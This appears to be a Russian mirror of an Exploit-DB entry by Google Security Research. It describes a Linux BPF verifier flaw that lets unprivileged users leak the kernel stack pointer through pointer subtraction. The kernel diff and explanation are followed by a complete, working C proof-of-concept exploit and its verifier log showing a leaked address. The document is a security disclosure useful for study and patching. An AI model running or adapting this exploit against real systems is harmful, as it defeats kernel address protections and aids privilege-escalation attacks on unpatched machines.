- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 45557
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- N/A
- Дата публикации
- 2018-10-08
Linux - Kernel Pointer Leak via BPF
C:
/*
Commit 82abbf8d2fc46d79611ab58daa7c608df14bb3ee ("bpf: do not allow root to mangle valid pointers", first in v4.15) included the following snippet:
=========
@@ -2319,43 +2307,29 @@ static int adjust_reg_min_max_vals(struct bpf_verifier_env *env,
if (src_reg->type != SCALAR_VALUE) {
if (dst_reg->type != SCALAR_VALUE) {
/* Combining two pointers by any ALU op yields
- * an arbitrary scalar.
+ * an arbitrary scalar. Disallow all math except
+ * pointer subtraction
- if (!env->allow_ptr_leaks) {
- verbose(env, "R%d pointer %s pointer prohibited\n",
- insn->dst_reg,
- bpf_alu_string[opcode >> 4]);
- return -EACCES;
+ if (opcode == BPF_SUB){
+ mark_reg_unknown(env, regs, insn->dst_reg);
+ return 0;
}
- mark_reg_unknown(env, regs, insn->dst_reg);
- return 0;
+ verbose(env, "R%d pointer %s pointer prohibited\n",
+ insn->dst_reg,
+ bpf_alu_string[opcode >> 4]);
+ return -EACCES;
} else {
=========
This allows an unprivileged user to subtract any two values that don't have type SCALAR_VALUE, and obtain a result with type SCALAR_VALUE.
One obvious way in which this is dangerous is a subtraction between PTR_TO_STACK and PTR_TO_MAP_VALUE_OR_NULL: If the PTR_TO_MAP_VALUE_OR_NULL-typed value is NULL, then this directly leaks the kernel stack pointer.
I think that pointer-pointer subtractions should only be permitted when it can be proven that both pointers point into the same object.
I have attached a PoC. BPF disassembly and output:
==============
user@debian:~/bpf_ptrleak_nullsub$ gcc -o ptrleak_nullsub ptrleak_nullsub.c && ./ptrleak_nullsub
==========================
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -4
4: (62) *(u32 *)(r2 +0) = 9
5: (85) call bpf_map_lookup_elem#1
6: (bf) r9 = r10
7: (1f) r9 -= r0
8: (18) r1 = 0x0
10: (bf) r2 = r10
11: (07) r2 += -4
12: (62) *(u32 *)(r2 +0) = 0
13: (85) call bpf_map_lookup_elem#1
14: (55) if r0 != 0x0 goto pc+1
R0=inv0 R9=inv(id=0) R10=fp0,call_-1
15: (95) exit
from 14 to 16: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=inv(id=0) R10=fp0,call_-1
16: (7b) *(u64 *)(r0 +0) = r9
R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=inv(id=0) R10=fp0,call_-1
17: (b7) r0 = 0
18: (95) exit
processed 17 insns (limit 131072), stack depth 4
==========================
leaked pointer: 0xffff9ec802103c78
user@debian:~/bpf_ptrleak_nullsub$
==============
*/
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/filter.h>
#include <sys/syscall.h>
#include <stdint.h>
#include <sys/socket.h>
#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10
#define BPF_FUNC_trace_printk 6
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
((struct bpf_insn) { \
.code = BPF_LD | BPF_DW | BPF_IMM, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = (__u32) (IMM) }), \
((struct bpf_insn) { \
.code = 0, /* zero is reserved opcode */ \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = ((__u64) (IMM)) >> 32 })
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EMIT_CALL(FUNC) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_CALL, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = (FUNC) })
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
int bpf_(int cmd, union bpf_attr *attrs) {
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}
int array_create(int value_size, int num_entries) {
union bpf_attr create_map_attrs = {
.map_type = BPF_MAP_TYPE_ARRAY,
.key_size = 4,
.value_size = value_size,
.max_entries = num_entries
};
int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
if (mapfd == -1)
err(1, "map create");
return mapfd;
}
uint64_t array_get_dw(int mapfd, uint32_t key) {
uint64_t value = 0;
union bpf_attr attr = {
.map_fd = mapfd,
.key = (uint64_t)&key,
.value = (uint64_t)&value,
.flags = BPF_ANY,
};
int res = bpf_(BPF_MAP_LOOKUP_ELEM, &attr);
if (res)
err(1, "map lookup elem");
return value;
}
int prog_load(struct bpf_insn *insns, size_t insns_count) {
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
printf("==========================\n%s==========================\n", verifier_log);
errno = errno_;
if (progfd == -1)
err(1, "prog load");
return progfd;
}
int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count) {
int progfd = prog_load(insns, insns_count);
// hook eBPF program up to a socket
// sendmsg() to the socket will trigger the filter
// returning 0 in the filter should toss the packet
int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
err(1, "socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
err(1, "setsockopt");
return socks[1];
}
void trigger_proc(int sockfd) {
if (write(sockfd, "X", 1) != 1)
err(1, "write to proc socket failed");
}
int main(void) {
int small_map = array_create(8, 1);
struct bpf_insn insns[] = {
// load NULL pointer, tracked as "NULL or value pointer", into r0
BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 9), //oob index
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
// compute r9 = laundered_frame_pointer
BPF_MOV64_REG(BPF_REG_9, BPF_REG_FP),
BPF_ALU64_REG(BPF_SUB, BPF_REG_9, BPF_REG_0),
// store r9 into map
BPF_LD_MAP_FD(BPF_REG_ARG1, small_map),
BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -4),
BPF_ST_MEM(BPF_W, BPF_REG_ARG2, 0, 0),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
BPF_EXIT_INSN(),
BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_9, 0),
BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};
int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
trigger_proc(sock_fd);
printf("leaked pointer: 0x%lx\n", array_get_dw(small_map, 0));
}
- Источник
- www.exploit-db.com